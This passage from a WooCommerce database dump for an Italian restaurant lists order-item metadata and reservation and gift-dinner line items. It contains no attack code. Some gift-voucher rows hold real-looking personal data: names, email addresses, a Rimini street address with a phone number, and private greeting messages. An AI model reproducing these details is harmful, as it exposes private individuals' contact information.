anniversario!'),(3641,364,'Delivery Method','Downloadable'),(3642,364,'Original Price','100'),(3643,364,'Image','IMG_0109.jpeg'),(3644,365,'_product_id','875'),(3645,365,'_variation_id','881'),(3646,365,'_qty','1'),(3647,365,'_tax_class',''),(3648,365,'_line_subtotal','30'),(3649,365,'_line_subtotal_tax','0'),(3650,365,'_line_total','30'),(3651,365,'_line_tax','0'),(3652,365,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3653,365,'pa_numero-coperti','2'),(3654,366,'_product_id','288'),(3655,366,'_variation_id','0'),(3656,366,'_qty','1'),(3657,366,'_tax_class',''),(3658,366,'_line_subtotal','30'),(3659,366,'_line_subtotal_tax','0'),(3660,366,'_line_total','30'),(3661,366,'_line_tax','0'),(3662,366,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3663,366,'_reduced_stock','1'),(3664,367,'_product_id','288'),(3665,367,'_variation_id','0'),(3666,367,'_qty','1'),(3667,367,'_tax_class',''),(3668,367,'_line_subtotal','30'),(3669,367,'_line_subtotal_tax','0'),(3670,367,'_line_total','30'),(3671,367,'_line_tax','0'),(3672,367,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3673,367,'_reduced_stock','1'),(3674,368,'_product_id','288'),(3675,368,'_variation_id','0'),(3676,368,'_qty','1'),(3677,368,'_tax_class',''),(3678,368,'_line_subtotal','30'),(3679,368,'_line_subtotal_tax','0'),(3680,368,'_line_total','30'),(3681,368,'_line_tax','0'),(3682,368,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3683,368,'_reduced_stock','1'),(3684,369,'_product_id','875'),(3685,369,'_variation_id','880'),(3686,369,'_qty','1'),(3687,369,'_tax_class',''),(3688,369,'_line_subtotal','120'),(3689,369,'_line_subtotal_tax','0'),(3690,369,'_line_total','120'),(3691,369,'_line_tax','0'),(3692,369,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3693,369,'pa_numero-coperti','8'),(3694,370,'_product_id','875'),(3695,370,'_variation_id','881'),(3696,370,'_qty','1'),(3697,370,'_tax_class',''),(3698,370,'_line_subtotal','30'),(3699,370,'_line_subtotal_tax','0'),(3700,370,'_line_total','30'),(3701,370,'_line_tax','0'),(3702,370,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3703,370,'pa_numero-coperti','2'),(3713,372,'_product_id','288'),(3714,372,'_variation_id','0'),(3715,372,'_qty','1'),(3716,372,'_tax_class',''),(3717,372,'_line_subtotal','30'),(3718,372,'_line_subtotal_tax','0'),(3719,372,'_line_total','30'),(3720,372,'_line_tax','0'),(3721,372,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3722,373,'_product_id','288'),(3723,373,'_variation_id','0'),(3724,373,'_qty','1'),(3725,373,'_tax_class',''),(3726,373,'_line_subtotal','30'),(3727,373,'_line_subtotal_tax','0'),(3728,373,'_line_total','30'),(3729,373,'_line_tax','0'),(3730,373,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3731,373,'_reduced_stock','1'),(3732,374,'_product_id','288'),(3733,374,'_variation_id','0'),(3734,374,'_qty','1'),(3735,374,'_tax_class',''),(3736,374,'_line_subtotal','30'),(3737,374,'_line_subtotal_tax','0'),(3738,374,'_line_total','30'),(3739,374,'_line_tax','0'),(3740,374,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3741,374,'_reduced_stock','1'),(3742,375,'_product_id','288'),(3743,375,'_variation_id','0'),(3744,375,'_qty','1'),(3745,375,'_tax_class',''),(3746,375,'_line_subtotal','30'),(3747,375,'_line_subtotal_tax','0'),(3748,375,'_line_total','30'),(3749,375,'_line_tax','0'),(3750,375,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3751,375,'_reduced_stock','1'),(3752,376,'_product_id','288'),(3753,376,'_variation_id','0'),(3754,376,'_qty','1'),(3755,376,'_tax_class',''),(3756,376,'_line_subtotal','30'),(3757,376,'_line_subtotal_tax','0'),(3758,376,'_line_total','30'),(3759,376,'_line_tax','0'),(3760,376,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3761,377,'_product_id','548'),(3762,377,'_variation_id','0'),(3763,377,'_qty','1'),(3764,377,'_tax_class',''),(3765,377,'_line_subtotal','100'),(3766,377,'_line_subtotal_tax','0'),(3767,377,'_line_total','100'),(3768,377,'_line_tax','0'),(3769,377,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3770,377,'To Name','Silvia Draghetti'),(3771,377,'To','silvia.draghetti@bahlsen.it'),(3772,377,'From','antonella.biagini@bahlsen.it'),(3773,377,'Message','Non siamo sicuri se fissando un appuntamento saremmo riusciti ad abbracciarti..….\r\nNel frattempo brinda con noi di fronte al mare \r\nAuguri Buon Compleanno !!!!\r\nAntonella, Alessandra, Giulia , Melania , Mambo , Matteo S.(the new entry)'),(3774,377,'Delivery Method','Mail to recipient'),(3775,377,'Original Price','100'),(3776,377,'Image','silvia.jpg'),(3777,378,'_product_id','472'),(3778,378,'_variation_id','0'),(3779,378,'_qty','1'),(3780,378,'_tax_class',''),(3781,378,'_line_subtotal','125'),(3782,378,'_line_subtotal_tax','0'),(3783,378,'_line_total','125'),(3784,378,'_line_tax','0'),(3785,378,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3786,378,'To','Michela'),(3787,378,'From','Gaia'),(3788,378,'Message','❤️'),(3789,378,'Delivery Method','Downloadable'),(3790,378,'Original Price','125'),(3791,379,'_product_id','435'),(3792,379,'_variation_id','0'),(3793,379,'_qty','1'),(3794,379,'_tax_class',''),(3795,379,'_line_subtotal','100'),(3796,379,'_line_subtotal_tax','0'),(3797,379,'_line_total','100'),(3798,379,'_line_tax','0'),(3799,379,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3800,379,'To Name','franco'),(3801,379,'To','webmaster@baldisserri.com'),(3802,379,'From','FRANCO'),(3803,379,'Message','PROVA'),(3804,379,'Delivery Method','Mail to recipient'),(3805,379,'Original Price','100'),(3806,379,'Selected Template','468'),(3807,380,'_product_id','472'),(3808,380,'_variation_id','0'),(3809,380,'_qty','1'),(3810,380,'_tax_class',''),(3811,380,'_line_subtotal','125'),(3812,380,'_line_subtotal_tax','0'),(3813,380,'_line_total','125'),(3814,380,'_line_tax','0'),(3815,380,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3816,380,'To Name','franco'),(3817,380,'To','webmaster@baldisserri.com'),(3818,380,'From','franco'),(3819,380,'Message','prova'),(3820,380,'Delivery Method','Mail to recipient'),(3821,380,'Original Price','125'),(3822,381,'_product_id','548'),(3823,381,'_variation_id','0'),(3824,381,'_qty','1'),(3825,381,'_tax_class',''),(3826,381,'_line_subtotal','100'),(3827,381,'_line_subtotal_tax','0'),(3828,381,'_line_total','100'),(3829,381,'_line_tax','0'),(3830,381,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3831,381,'To Name','Filippo Saulle'),(3832,381,'To','Filos4@libero.it'),(3833,381,'From','Amalia e Riccardo Manduchi'),(3834,381,'Message','Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!'),(3835,381,'Delivery Method','Mail to recipient'),(3836,381,'Original Price','100'),(3837,381,'Image','FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg'),(3838,382,'_product_id','875'),(3839,382,'_variation_id','881'),(3840,382,'_qty','1'),(3841,382,'_tax_class',''),(3842,382,'_line_subtotal','30'),(3843,382,'_line_subtotal_tax','0'),(3844,382,'_line_total','30'),(3845,382,'_line_tax','0'),(3846,382,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3847,382,'pa_numero-coperti','2'),(3848,383,'_product_id','548'),(3849,383,'_variation_id','0'),(3850,383,'_qty','1'),(3851,383,'_tax_class',''),(3852,383,'_line_subtotal','58'),(3853,383,'_line_subtotal_tax','0'),(3854,383,'_line_total','58'),(3855,383,'_line_tax','0'),(3856,383,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3857,383,'To','Matteo Arlotti'),(3858,383,'From','Matteo Arlotti'),(3859,383,'Message','Cena delivery 28-11 \r\nViale Ugo Foscolo 27 - Rimini  47921\r\n371 3930671'),(3860,383,'Delivery Method','Downloadable'),(3861,383,'Original Price','58'),(3862,384,'_product_id','548'),(3863,384,'_variation_id','0'),(3864,384,'_qty','1'),(3865,384,'_tax_class',''),(3866,384,'_line_subtotal','100'),(3867,384,'_line_subtotal_tax','0'),(3868,384,'_line_total','100'),(3869,384,'_line_tax','0'),(3870,384,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3871,384,'To','Laura Lucchi'),(3872,384,'From','Tom e Edo'),(3873,384,'Message','Buon Natale 2020'),(3874,384,'Delivery Method','Downloadable'),(3875,384,'Original Price','100'),(3876,385,'_product_id','548'),(3877,385,'_variation_id','0'),(3878,385,'_qty','1'),(3879,385,'_tax_class',''),(3880,385,'_line_subtotal','100'),(3881,385,'_line_subtotal_tax','0'),(3882,385,'_line_total','100'),(3883,385,'_line_tax','0'),(3884,385,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3885,385,'To','c.lorenzetti@inwind.it'),(3886,385,'From','Elena e Piero'),(3887,385,'Message','Vi auguriamo buone feste e speriamo di regalarvi un momento di meritato relax!!!'),(3888,385,'Delivery Method','Downloadable'),(3889,385,'Original Price','100'),(3890,386,'_product_id','548'),(3891,386,'_variation_id','0'),(3892,386,'_qty','1'),(3893,386,'_tax_class',''),(3894,386,'_line_subtotal','100'),(3895,386,'_line_subtotal_tax','0'),(3896,386,'_line_total','100'),(3897,386,'_line_tax','0'),(3898,386,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3899,386,'To','Laura Lucchi'),(3900,386,'From','Tom e Edo'),(3901,386,'Message','Buon Natale 2020'),(3902,386,'Delivery Method','Downloadable'),(3903,386,'Original Price','100'),(3904,387,'_product_id','548'),(3905,387,'_variation_id','0'),(3906,387,'_qty','1'),(3907,387,'_tax_class',''),(3908,387,'_line_subtotal','100'),(3909,387,'_line_subtotal_tax','0'),(3910,387,'_line_total','100'),(3911,387,'_line_tax','0'),(3912,387,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3913,387,'To','Laura e Matteo'),(3914,387,'From','Tom e Edo'),(3915,387,'Message','Buon Natale parents!!!'),(3916,387,'Delivery Method','Downloadable'),(3917,387,'Original Price','100'),(3918,388,'_product_id','548'),(3919,388,'_variation_id','0'),(3920,388,'_qty','1'),(3921,388,'_tax_class',''),(3922,388,'_line_subtotal','100'),(3923,388,'_line_subtotal_tax','0'),(3924,388,'_line_total','100'),(3925,388,'_line_tax','0'),(3926,388,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3927,388,'To','c.lorenzetti@inwind.it'),(3928,388,'From','Elena e Piero'),(3929,388,'Message','Vi auguriamo buone feste e speriamo di regalarvi un momento di meritato relax!!!'),(3930,388,'Delivery Method','Downloadable'),(3931,388,'Original Price','100'),(3932,389,'_product_id','548'),(3933,389,'_variation_id','0'),(3934,389,'_qty','1'),(3935,389,'_tax_class',''),(3936,389,'_line_subtotal','100'),(3937,389,'_line_subtotal_tax','0'),(3938,389,'_line_total','100'),(3939,389,'_line_tax','0'),(3940,389,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3941,389,'To','c.lorenzetti@inwind.it'),(3942,389,'From','Elena e Piero'),(3943,389,'Message','Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...'),(3944,389,'Delivery Method','Downloadable'),(3945,389,'Original Price','100'),(3946,390,'_product_id','548'),(3947,390,'_variation_id','0'),(3948,390,'_qty','1'),(3949,390,'_tax_class',''),(3950,390,'_line_subtotal','100'),(3951,390,'_line_subtotal_tax','0'),(3952,390,'_line_total','100'),(3953,390,'_line_tax','0'),(3954,390,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3955,390,'To','c.lorenzetti@inwind.it'),(3956,390,'From','Elena e Piero'),(3957,390,'Message','Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...'),(3958,390,'Delivery Method','Downloadable'),(3959,390,'Original Price','100');
/*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_order_items`
--

DROP TABLE IF EXISTS `wp_woocommerce_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_order_items` (
  `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_name` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `order_item_type` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `order_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=MyISAM AUTO_INCREMENT=391 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_order_items`
--

LOCK TABLES `wp_woocommerce_order_items` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_order_items` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_order_items` VALUES (1,'Prenotazione Tavolo Prova','line_item',218),(2,'Prenotazione Tavolo Prova','line_item',219),(3,'Prenotazione Tavolo per 2 Persone','line_item',229),(4,'Prenotazione Tavolo per 2 Persone','line_item',230),(5,'Prenotazione Tavolo per 2 Persone','line_item',231),(6,'Prenotazione Tavolo per 2 Persone','line_item',232),(7,'Prenotazione Tavolo per 6 Persone','line_item',233),(8,'Prenotazione Tavolo per 2 Persone','line_item',235),(9,'Prenotazione Tavolo per 2 Persone','line_item',239),(10,'Prenotazione Tavolo per 2 Persone','line_item',240),(11,'Prenotazione Tavolo per 2 Persone','line_item',241),(12,'Prenotazione Tavolo per 6 Persone','line_item',242),(13,'Prenotazione Tavolo per 4 Persone','line_item',243),(14,'Prenotazione Tavolo per 2 Persone','line_item',243),(15,'Prenotazione Tavolo per 2 Persone','line_item',246),(16,'Prenotazione Tavolo per 4 Persone','line_item',248),(17,'Prenotazione Tavolo per 6 Persone','line_item',250),(18,'Prenotazione Tavolo per 3 Persone','line_item',252),(19,'Prenotazione Tavolo per 2 Persone','line_item',253),(20,'Prenotazione Tavolo per 4 Persone','line_item',254),(21,'Prenotazione Tavolo per 2 Persone','line_item',255),(22,'Prenotazione Tavolo per 2 Persone','line_item',256),(23,'Prenotazione Tavolo per 5 Persone','line_item',257),(24,'Prenotazione Tavolo per 2 Persone','line_item',258),(25,'Prenotazione Tavolo per 2 Persone','line_item',259),(26,'Prenotazione Tavolo per 4 Persone','line_item',261),(27,'Prenotazione Tavolo per 5 Persone','line_item',265),(30,'Prenotazione Tavolo per 4 Persone','line_item',266),(31,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',291),(32,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',295),(33,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',296),(34,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',297),(35,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',298),(36,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',299),(37,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',302),(38,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',304),(39,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',305),(40,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',306),(41,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',307),(42,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',308),(43,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',309),(44,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',310),(45,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',311),(47,'Prenotazione Tavolo per 4 Persone San Valentino','line_item',312),(48,'Prenotazione Tavolo per 4 Persone San Valentino','line_item',313),(49,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',314),(50,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',316),(52,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',318),(53,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',319),(54,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',342),(56,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',343),(57,'Prenotazione Tavolo per 3 Persone - Pasqua','line_item',344),(58,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',345),(59,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',346),(60,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',347),(61,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',348),(62,'Prenotazione Tavolo per 3 Persone - Pasqua','line_item',349),(63,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',350),(64,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',351),(65,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',352),(66,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',353),(67,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',354),(68,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',355),(69,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',357),(70,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',358),(71,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',359),(72,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',360),(73,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',361),(74,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',362),(75,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',363),(76,'Prenotazione Tavolo per 3 Persone - Pasqua','line_item',364),(77,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',365),(78,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',366),(79,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',367),(80,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',368),(81,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',369),(82,'Prenotazione Tavolo per 9 Persone - Pasquetta','line_item',370),(83,'Prenotazione Tavolo per 7 Persone - Pasquetta','line_item',371),(84,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',372),(85,'Prenotazione Tavolo per 5 Persone - Pasqua','line_item',373),(86,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',374),(88,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',375),(89,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',376),(90,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',377),(92,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',379),(94,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',378),(95,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',380),(96,'Prenotazione Tavolo per 5 Persone - Pasquetta','line_item',381),(97,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',382),(98,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',383),(99,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',384),(100,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',385),(101,'Prenotazione Tavolo per 5 Persone - Pasqua','line_item',386),(102,'Prenotazione Tavolo per 7 Persone - Pasqua','line_item',387),(103,'Regala cena: Menù Creativo per 2 persone','line_item',487),(104,'Acquista Pranzo/Cena: Menù storico per 2 persone + Bevande','line_item',489),(105,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',489),(106,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',490),(107,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',492),(108,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',494),(109,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',496),(110,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',525),(111,'Prenotazione Tavolo per 2 Persone','line_item',527),(112,'Prenotazione Tavolo per 4 Persone','line_item',535),(113,'Prenotazione Tavolo per 2 Persone','line_item',536),(114,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',537),(116,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',538),(117,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',539),(118,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',540),(119,'Prenotazione Tavolo per 6 Persone - Capodanno 2018','line_item',542),(120,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',543),(121,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',544),(122,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',545),(123,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',546),(124,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',549),(125,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',552),(126,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',553),(127,'Prenotazione Tavolo per 3 Persone - Capodanno 2018','line_item',553),(128,'Buono Regalo (valore a scelta)','line_item',555),(130,'Prenotazione Tavolo per 6 Persone - Capodanno 2018','line_item',557),(131,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',558),(132,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',559),(133,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',560),(134,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',562),(135,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',563),(136,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',564),(137,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',565),(138,'Prenotazione Tavolo per 3 Persone - Capodanno 2018','line_item',566),(139,'Prenotazione Tavolo per 3 Persone - Capodanno 2018','line_item',567),(140,'Prenotazione Tavolo per 6 Persone - Capodanno 2018','line_item',568),(141,'Regala cena: Menù Creativo per 2 persone','line_item',570),(142,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',572),(143,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',573),(144,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',575),(145,'Regala cena: Menù Creativo per 2 persone','line_item',576),(146,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',579),(147,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',579),(150,'Prenotazione Tavolo per 4 Persone - Capodanno 2018','line_item',580),(151,'Prenotazione Tavolo per 6 Persone - Capodanno 2018','line_item',582),(152,'Prenotazione Tavolo per 2 Persone - Capodanno 2018','line_item',583),(153,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',584),(154,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',585),(155,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',594),(156,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',595),(157,'Prenotazione Tavolo per 4 Persone San Valentino','line_item',596),(158,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',597),(159,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',598),(160,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',599),(161,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',600),(162,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',601),(163,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',602),(164,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',604),(165,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',605),(167,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',606),(168,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',607),(169,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',608),(170,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',609),(171,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',610),(172,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',611),(173,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',612),(174,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',613),(175,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',614),(177,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',615),(178,'Buono Regalo (valore a scelta)','line_item',616),(179,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',634),(180,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',635),(181,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',636),(182,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',637),(183,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',638),(184,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',638),(185,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',639),(186,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',640),(187,'Prenotazione Tavolo per 6 Persone - Pasqua','line_item',641),(188,'Prenotazione Tavolo per 6 Persone - Pasqua','line_item',643),(189,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',647),(190,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',648),(191,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',649),(192,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',650),(193,'Prenotazione Tavolo per 6 Persone - Pasqua','line_item',651),(194,'Regala cena: Menù Creativo per 2 persone','line_item',652),(196,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',655),(197,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',656),(198,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',657),(199,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',658),(200,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',659),(201,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',661),(202,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',662),(203,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',662),(206,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',663),(207,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',664),(208,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',665),(210,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',666),(212,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',667),(213,'Prenotazione Tavolo per 7 Persone - Pasqua','line_item',668),(214,'Prenotazione Tavolo per 5 Persone - Pasquetta','line_item',669),(215,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',670),(217,'Prenotazione Tavolo per 3 Persone - Pasqua','line_item',671),(218,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',672),(220,'Prenotazione Tavolo per 6 Persone - Pasquetta','line_item',673),(221,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',674),(222,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',675),(223,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',676),(224,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',677),(225,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',678),(226,'Prenotazione Tavolo per 5 Persone - Pasquetta','line_item',679),(227,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',680),(228,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',681),(229,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',682),(230,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',683),(231,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',684),(232,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',686),(233,'Buono Regalo (valore a scelta)','line_item',688),(234,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',690),(235,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',693),(236,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',695),(237,'Buono Regalo (valore a scelta)','line_item',697),(238,'Regala cena: Menù Creativo per 2 persone','line_item',699),(239,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',701),(240,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',702),(241,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',704),(242,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',707),(243,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',709),(244,'Regala cena: Menù Creativo per 2 persone','line_item',716),(245,'Buono Regalo (valore a scelta)','line_item',718),(246,'Regala cena: Menù Storico per 2 persone','line_item',720),(247,'Buono Regalo (valore a scelta)','line_item',722),(248,'Buono Regalo (valore a scelta)','line_item',724),(249,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',734),(250,'Prenotazione 